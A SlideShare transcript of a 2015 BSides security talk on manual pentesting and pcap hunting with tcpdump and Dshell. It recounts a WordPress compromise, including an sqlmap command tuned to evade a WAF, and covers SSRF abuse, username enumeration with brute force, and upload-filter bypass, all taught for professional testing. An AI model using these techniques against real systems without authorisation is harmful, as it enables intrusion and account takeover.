SlideShare ist ein Scribd-Unternehmen logo

BSides_Charm2015_Info sec hunters_gathers

Als PPTX, PDF herunterladen
Andrew McNicol
Andrew McNicol

This document discusses techniques for going beyond automated tools and scans to hunt for vulnerabilities and gather intelligence as an information security professional. It provides defensive use cases like analyzing pcap files with tcpdump and Dshell to profile network activity. Offensive techniques discussed include pushing past roadblocks during pentests, abusing features like contact forms, and testing remediation. It emphasizes the value of learning scripting languages like Python to build your own tools for tasks like vulnerability scanning and demonstrating proof of concepts. The overall message is that security professionals should adopt a hunter/gatherer mindset to find issues missed by automated tools alone.

1 von 77
InfoSec Hunters and Gatherers By Primal Security 1
Who Are We? • Primal Security: www.primalsecurity.net –Blog, Podcast, Tutorials •Our blog and tutorials documented a lot of our experience through OSCP/OSCE 2
Zack Meyers @b3armunch • Continuous Monitoring Enthusiast • PrimalSec team member and Web Application Pentester GET • Any and all information I can EVER find on offensive techniques, tools and procedures. POST • I love hot sauce and will eat small meals periodically throughout the day aka “Zack Snacks” :) 3
Andrew McNicol @PrimalSec • Security consultant • Co-Founder and one of the lead authors of Primal Security blog/podcast try: print ‘I enjoy writing error-free Python with Google and stackoverflow” except:pass • I spend my day abusing features in web applications - previous IR (pcap, malware) 4
Quick Outline • Hunter/Gatherer • Defensive Use Cases: – Slicing and dicing pcap w/tcpdump + Dshell – Staying ahead of the game • Offensive Use Cases: – A pentest is not a scan – Pushing Past Walls – Abusing Contact Us/Feedback Features – Testing Remediation #ThinkDifferently • Making Your Own Tools - A quick look at Python 5
We didn’t do it • We are not lawyers and/or giving you any legal advice. • We are not giving you permission or authorizing you in any way to do anything. • In fact don’t do anything ever... 6
This talk • Too many people only leverage automated tool output to perform their job function • We plan to share some of our experience on going beyond automated tools. • Note: We do like automated tools – This is not a talk on bashing them! 7
What is a Gatherer? • Someone who leverages automated tools: – Find vulnerabilities with scanners – Find interesting network traffic with an IDS 8
What is a Hunter? • One who goes beyond automated tools to: – Find vulnerabilities missed by vulnerability scanners – Find evil in a sea of pcap – Writes their own tools 9
Hunter Mindset • General Zod or John Wick mode #Focus #Confidence 10
Defensive Use Cases 11
WARNING – PCAP Ahead 12
Hunting with tcpdump • The ability to rip through pcap using tcpdump/Bash is a very useful skill • Profiling network activity can help you find what might be missed • We have a whole talk just on this topic: –www.primalsecurity.net/being-the-hunter- with-tcpdump 13
Hunting with tcpdump Cont. • How do you deal with the output? – BPFs and Linux Utilities 14
Hunting with tcpdump: Linux Utilities • grep / egrep - Powerful search utilities –Useful switches -i, -v • sort / uniq • awk - Awesome utility, lots of functionality - I use it to prints parts of a line –Useful switch -F 15
Hunting with tcpdump: BPFs • Berkeley Packet Filter (BPFs) can filter for packets of interest: – host – net – port – src / dst – Boolean logic (and, or) – Protocol specific (tcp, udp, icmp, etc.) 16
Useful Bash 1-liner for tcpdump • Useful 1 liner to read in multiple files at once with tcpdump: for i in `ls *.pcap`; do <tcpdump_comm>; done • This for loop can be useful for really any command you need to run through a loop 17
Hunting with tcpdump: DNS • I see DNS as a treasure trove of information • You may find me getting dragon sickness over all the gold in DNS :) 18
Hunting with tcpdump: DNS Cont. • Summarizing DNS with tcpdump/Bash: –for i in `ls *.pcap`; do tcpdump -ttttnnr $i udp and port 53; done | grep ‘ A? ‘ 19
Hunting with tcpdump: DNS Cont. •Summarizing DNS with tcpdump/Bash: 20
Hunting with tcpdump: DNS Cont. •Summarizing DNS with tcpdump/Bash: 21
Hunting with tcpdump: DNS Cont. •Advanced DNS BPF: 22
Hunting with tcpdump: DNS Cont. •Advanced DNS BPF: 23
Hunting with tcpdump: Outbound Connections • Find the SYN every hour ☺ #NeedleInHaystack • Same approach as DNS, but we will focus on summarizing the dst IP in SYN packet 24
Hunting with tcpdump: Outbound Connections Cont. • Quick BPF to key in on SYNs “tcp[13]=2” • Next we will use “awk” to grab just the dst IP 25
Hunting with tcpdump: Outbound Connections Cont. • Now we can summarize the dst IP with “awk” and “sort/uniq” 26
Hunting with tcpdump: Outbound Connections Cont. • Now to speed things up we can extract just the IP and then toss into a script to lookup network info (CIDR/Net Owner) 27
Hunting with tcpdump: Outbound Connections Cont. • Now we can add in a bit of Python to lookup network info using Team Cymru’s Python whois module: 28
Hunting with tcpdump: Outbound Connections Cont. •Advanced BPF Example: 29
Hunting with Dshell • Dshell is a Python based network hunting tool • Takes stuff spread across several packets and puts relevant details on an evenly spaced line 30
Hunting with Dshell Cont. • Dshell has several modules for hunting: – dns: matches up request/response – synrst: SYN followed by RST/ACK – netflow – web: parses HTTP request/response • Check out the blog post on SANS: – https://isc.sans.edu/diary/Another+Networ k+Forensic+Tool+for+the+Toolbox+- +Dshell/19277 31
Be in the Know • As InfoSec professionals we all sit on a throne of vulnerability data and system versioning information that can ideally look overwhelming from a glance. • So adjust your approach to keep yourself alert… • Be the Continuous Monitoring Hunter and Gatherer for your firm through these techniques... 32
Follow, Read, Apply, Repeat • Follow other info sec professionals via twitter for the latest news. • Read security blogs and rss feeds for information on the newest vulnerabilities/ exploits that are trending today. • Apply what you read and identify your firm's footprint if applicable (via vuln data or hunting with tools) or create a lab environment (VM) to test a recent exploit. • Repeat do this process again throughout the day when you can or have downtime. 33
Some CM Examples • Any security professional can appreciate a heads up! - Knowing info on the next BIG SCARY VULN before management does…#Heartbleed #Shellshock #POODLE #GHOST • Even knowing something as simple as a software having an out of band patch, security bulletin or approaching EOL - (i.e Java SE v7 EOL by the end of this month April 2015) 34
Spread Awareness • Sharing information and knowledge about threats as they emerge can not only help you, but more importantly your TEAM. • Reference blogs and the NIST NVD once a CVE is released to help track/ communicate amongst your team. 35
Offensive Use Cases 36
Scans Ran Found Nothing…So Secure, Right? • Often the focus of an assessment is to run tools and get things “scanned”: – “Did you run your scans?” – “How many checks did it fail?” 37
Managers will ask 38
Pushing Past Walls •Hacking is all about massive amounts of failure and not giving up •The right mindset is critical to being successful 39
Pushing Past Walls 40
Pushing Past Walls Cont. • Recent pentest we found a WordPress server •Could access login panel - So brute force is in! –Enumerate valid usernames via login error messages •Wpscan found some stuff to play with: –Avada Theme with Revslider –Paid Memberships Pro Path Traversal Vulnerability –Photo Gallery <= 1.2.7 - Unauthenticated SQL injection 41
Pushing Past Walls: Attack Plans • Brute Force:Had a valid username - very slow ☹ • Paid Memberships Pro 1.7.14.2 Path Traversal: – Worked! Sweet LFI (Grabbed wp-config.php) – It was via a php readfile() so no code execution 42
Pushing Past Walls: Attack Plans • Photo Gallery <= 1.2.7 - SQL injection • In lab: – Read up on the vulnerability – Replicated in lab – Tested it in lab environment and w00tw00t worked – On Assessment Server: – Needed to have a valid Gallery ID for the server – Attempted MSF module and failed ☹ – Dug through pcap, few requests in RSTs from the server…hmm potential WAF 43
Pushing Past Walls: Attack Plans • Figured out how to replicate the finding on lab setup with sqlmap: • sqlmap -u “<target_URL>” -p “order_by” --random- agent --tamper=between --dbms=mysql --level=5 -- risk=3 – Sqlmap on the target site – Still blocked! – Added in “--delay=“ and figured out I needed a 4 second delay to not trigger the WAF 44
So I am back to this again….. 45
Pushing Past Walls: Attack Plans • Result? Took a long time, but (DB Enum, Table Enum, --dump wp_users): – Screen shot from lab setup: 46
Pushing Past Walls • Was able to crack user hashes and authenticate to server and completely comprise the web app • Great win here, but lots of places I nearly stopped and had to push past to be successful • Much easier to give up 47
Contact Us and Feedback Forms 48
Example: SSRF open relay •Server Side Request Forgery (SSRF) vulnerabilities can make the web app your puppet: –Contact Us Forms –Feedback Forms –Forms to request external services: •tweets-grab.php 49
Example: SSRF open relay Cont. • Another team gave this site a clean bill of health after a WebInspect scan + remediation • Automated tools weren’t really working too well (Automated tool said 30 days) • Started to manually test features with Burp as proxy and found SSRF open relay ☺ 50
Example: SSRF open relay Cont. • Gave me the ability to send emails to anyone coming from anyone in the organization (#BeefHook) 51
Example: Vulns in Unlinked Content • Sharepoint sites are guilty of this where you may see a default IIS page at when visiting the FQDN, but then after some Google Fu, Burps Engagement Tool, etc. • site:<FQDN> or inurl:<FQDN> then from there leverage additional search operators to discover interesting information file:<extension> (maybe a .bak or .old) or (-) <FQDN> (kinda like a grep -v) • You find a new source of unlinked directories and resources that now establish a whole new attack surface! 52
Example: Vulns in Unlinked Content • Most automated tools will only evaluate linked content • Enumerating technology in use and making requests for default content – lots of wins (default admin panels, vulnerable resources, etc.) – Google searching “<technology> exploit” • Lots of vulns could be hanging out unlinked in the app 53
Username Enumeration • Difference in login messages •Password reset feature? – Attempting to reset the web admin “Which admin username did you want to reset?” • Metadata in documents on site 54
Username Enumeration Cont. • In our experience web applications commonly don’t have strong password complexity requirements – “password3” “p@ssword”….yes they still work • Enumerating usernames, combined with no lockout features, and some wordlists = account compromise: – Deploy code, emails, upload files, etc. 55
OSINT Example • Found Admin video on Youtube • Found Admin’s Github, LinkedIn, Facebook • Found Admin’s email in README of source code • Validated username via “Forgot my username” feature • Found additional connections to admin who liked his post on facebook and worked for same organization: – Brute forced accounts and gained access to application •We have a whole talk on OSINT: www.primalsecurity.net/osint/ 56
Scanner Takes Too Long • Not uncommon for an automated tool to say “Estimated time 34 days…” 57
Automated Tool Crashes App • Not uncommon for an automated tool to tip over a server • Throw an automated tool at a sensitive web application... You might see something like this: 58
Automated Tool Crashes App Cont. • Should still be noted in the report as a finding - The big boy internet scans applications •You should also be able to perform manual testing to ensure other vulnerabilities are enumerated 59
Testing Remediation Example • fileupload.php (client-side mime type check) bypass it by changing the “Content-Type” 60
Testing Remediation Example • Developer fixes with additional server side checks and names the file fileupload2.php • How would you go about testing this? 61
Testing Remediation Example Cont. • I saw my input pass to “fileupload2.php” • I thought “Hmm, I wonder if fileupload.php is still accessible…” 62
Making Your Own Tools 63
Learning a Scripting Language • I find it a necessary part of my day to day • Learning a scripting language isn’t that hard • It’s like starting a friction fire 64
Python • Python is my weapon of choice • This talk won't teach you how to write Python, but we plan to show some examples –We have a whole talk and tutorial on Python: •Talk: www.primalsecurity.net/introduction-to-python- for-security-professionals/ •Tutorial: www.primalsecurity.net/tutorials/python- tutorials/ • We suggest picking a small project and tackle it 65
Python Resources • Courses: – SecurityTube’s Python Scripting Expert Course – Google has a free course on Python – Codecademy Python course • Books: – Violent Python by TJ O‘Connor – Gray Hat and Black Hat Python by Justin Seitz 66
Python Modules • Python has a lot of built-in and 3rd party modules that can do the heavy lifting for you • OS command: • whois lookup: 67
Python Web Scanner • During our assessments we find it very useful to make custom scripts to automate interaction with web applications • Making web requests in Python is a very practical use case 68
Python Web Scanner Cont. • A basic web scanner example 69
More Advanced Web Scanner •PrimalSec <!-- Web Testing Framework --> 70
Python examples - ShellShock • In Corelan training at DerbyCon …..deprived of sleep and overdosed on red bull -> Enter ShellShock –Had to spin up a tool to check for ShellShock 71
Python - ShellShock Cont. • Below is a quick Proof of Concept (PoC) for Shellshock 72
Python - ShellShock Cont. •Example output - this illustrates how to automate a RCE to make it feel like a web shell 73
Writing Scripts for Assessment Report • Writing a script to demonstrate a vulnerability or the report can help land the impact – LFI/RFI -> Shell – Automating an RCE / web shell capability – Automating a SSRF to show potential impact 74
Useful Training • Offensive Security: OSCP/OSCE • eLearnSecurity • SANS • Vulnhub.com • We have a talk covering this in more depth: –www.primalsecurity.net/how-to-be-an-infosec-geek/ 75
In Summary • We hope this talk inspired more people to: – Be a Hunter and Gatherer – Pick up a scripting language or Bash Kung Fu #StartTheFire • Hopefully you can go out tomorrow and find bad guys or vulnerabilities that may have been missed for days, months, or even years! 76
Contact Us • Primal Security –Website: www.primalsecurity.net –Email: andrew@primalsecurity.net –Twitter: @PrimalSec, @b3armunch 77

Empfohlen

BSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated TestingBSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated Testing
Andrew McNicol
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016
Andrew McNicol
 
Pentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingPentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated Testing
Andrew McNicol
 
Introduction to Penetration Testing
Introduction to Penetration TestingIntroduction to Penetration Testing
Introduction to Penetration Testing
Andrew McNicol
 
BSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointBSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPoint
Andrew McNicol
 
BSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPointBSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPoint
Andrew McNicol
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability Management
Andrew McNicol
 
Tcpdump hunter
Tcpdump hunterTcpdump hunter
Tcpdump hunter
Andrew McNicol
 

Empfohlen

BSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated TestingBSidesDC 2016 Beyond Automated Testing
BSidesDC 2016 Beyond Automated Testing
Andrew McNicol
 
Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016Beyond Automated Testing - RVAsec 2016
Beyond Automated Testing - RVAsec 2016
Andrew McNicol
 
Pentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated TestingPentesting Tips: Beyond Automated Testing
Pentesting Tips: Beyond Automated Testing
Andrew McNicol
 
Introduction to Penetration Testing
Introduction to Penetration TestingIntroduction to Penetration Testing
Introduction to Penetration Testing
Andrew McNicol
 
BSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPointBSides Philly Finding a Company's BreakPoint
BSides Philly Finding a Company's BreakPoint
Andrew McNicol
 
BSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPointBSidesJXN 2016: Finding a Company's BreakPoint
BSidesJXN 2016: Finding a Company's BreakPoint
Andrew McNicol
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability Management
Andrew McNicol
 
Tcpdump hunter
Tcpdump hunterTcpdump hunter
Tcpdump hunter
Andrew McNicol
 
How To Start Your InfoSec Career
How To Start Your InfoSec CareerHow To Start Your InfoSec Career
How To Start Your InfoSec Career
Andrew McNicol
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
Andrew McNicol
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Chris Gates
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
CODE BLUE
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
dc612
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
Paul Melson
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
Nick Landers
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
grecsl
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
marcioalma
 
Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17
Brandon Arvanaghi
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Rob Fuller
 
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"
Lane Huff
 
Entomology 101
Entomology 101Entomology 101
Entomology 101
snyff
 
'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh
Bipin Upadhyay
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be Hunted
Alex Davies
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
Hunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forestHunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forest
SecuRing
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPointBsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Zack Meyers
 
Penetration testing, What’s this?
Penetration testing, What’s this?Penetration testing, What’s this?
Penetration testing, What’s this?
Dmitry Evteev
 
My tryst with sourcecode review
My tryst with sourcecode reviewMy tryst with sourcecode review
My tryst with sourcecode review
Anant Shrivastava
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
Peter Hlavaty
 

Weitere ähnliche Inhalte

Was ist angesagt?

[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
CODE BLUE
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
Nick Landers
 
Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17
Brandon Arvanaghi
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPointBsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Zack Meyers
 
Penetration testing, What’s this?
Penetration testing, What’s this?Penetration testing, What’s this?
Penetration testing, What’s this?
Dmitry Evteev
 

Was ist angesagt? (20)

How To Start Your InfoSec Career
How To Start Your InfoSec CareerHow To Start Your InfoSec Career
How To Start Your InfoSec Career
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
 
Malware Analysis Made Simple
Malware Analysis Made SimpleMalware Analysis Made Simple
Malware Analysis Made Simple
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
Malware Analysis 101 - N00b to Ninja in 60 Minutes at BSidesLV on August 5, ...
 
Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0Internal Pentest: from z3r0 to h3r0
Internal Pentest: from z3r0 to h3r0
 
Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17Breadcrumbs to Loaves: BSides Austin '17
Breadcrumbs to Loaves: BSides Austin '17
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"
Introduction to Dynamic Malware Analysis ...Or am I "Cuckoo for Malware?"
 
Entomology 101
Entomology 101Entomology 101
Entomology 101
 
'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh'Malware Analysis' by PP Singh
'Malware Analysis' by PP Singh
 
BSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be HuntedBSides London 2017 - Hunt Or Be Hunted
BSides London 2017 - Hunt Or Be Hunted
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
Hunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forestHunting for the secrets in a cloud forest
Hunting for the secrets in a cloud forest
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPointBsides-Philly-2016-Finding-A-Companys-BreakPoint
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
 
Penetration testing, What’s this?
Penetration testing, What’s this?Penetration testing, What’s this?
Penetration testing, What’s this?
 

Ähnlich wie BSides_Charm2015_Info sec hunters_gathers

You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
Peter Hlavaty
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Bishop Fox
 
Monitorama 2015 Netflix Instance Analysis
Monitorama 2015 Netflix Instance AnalysisMonitorama 2015 Netflix Instance Analysis
Monitorama 2015 Netflix Instance Analysis
Brendan Gregg
 
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
EC-Council
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
CODE BLUE
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
Mike Felch
 

Ähnlich wie BSides_Charm2015_Info sec hunters_gathers (20)

My tryst with sourcecode review
My tryst with sourcecode reviewMy tryst with sourcecode review
My tryst with sourcecode review
 
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel" You didnt see it’s coming? "Dawn of hardened Windows Kernel"
You didnt see it’s coming? "Dawn of hardened Windows Kernel"
 
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwonThe basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
The basics of hacking and penetration testing 이제 시작이야 해킹과 침투 테스트 kenneth.s.kwon
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploit
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
 
ethical Hack
ethical Hackethical Hack
ethical Hack
 
Wm4
Wm4Wm4
Wm4
 
Wm4
Wm4Wm4
Wm4
 
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
Malware Analysis 101 - N00b to Ninja in 60 Minutes at CactusCon on April 4, 2014
 
Monitorama 2015 Netflix Instance Analysis
Monitorama 2015 Netflix Instance AnalysisMonitorama 2015 Netflix Instance Analysis
Monitorama 2015 Netflix Instance Analysis
 
Recon-Fu @BsidesKyiv 2016
Recon-Fu @BsidesKyiv 2016Recon-Fu @BsidesKyiv 2016
Recon-Fu @BsidesKyiv 2016
 
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
Hacker Halted 2014 - RDP Fuzzing And Why the Microsoft Open Protocol Specific...
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
For the Greater Good: Leveraging VMware's RPC Interface for fun and profit by...
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
The Web Application Hackers Toolchain
The Web Application Hackers ToolchainThe Web Application Hackers Toolchain
The Web Application Hackers Toolchain
 
Socially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front DoorSocially Acceptable Methods to Walk in the Front Door
Socially Acceptable Methods to Walk in the Front Door
 
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an..."Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
 
DEF CON 23 - Rickey Lawshae - lets talk about soap
DEF CON 23 - Rickey Lawshae - lets talk about soapDEF CON 23 - Rickey Lawshae - lets talk about soap
DEF CON 23 - Rickey Lawshae - lets talk about soap
 

BSides_Charm2015_Info sec hunters_gathers

  • 1. InfoSec Hunters and Gatherers By Primal Security 1
  • 2. Who Are We? • Primal Security: www.primalsecurity.net –Blog, Podcast, Tutorials •Our blog and tutorials documented a lot of our experience through OSCP/OSCE 2
  • 3. Zack Meyers @b3armunch • Continuous Monitoring Enthusiast • PrimalSec team member and Web Application Pentester GET • Any and all information I can EVER find on offensive techniques, tools and procedures. POST • I love hot sauce and will eat small meals periodically throughout the day aka “Zack Snacks” :) 3
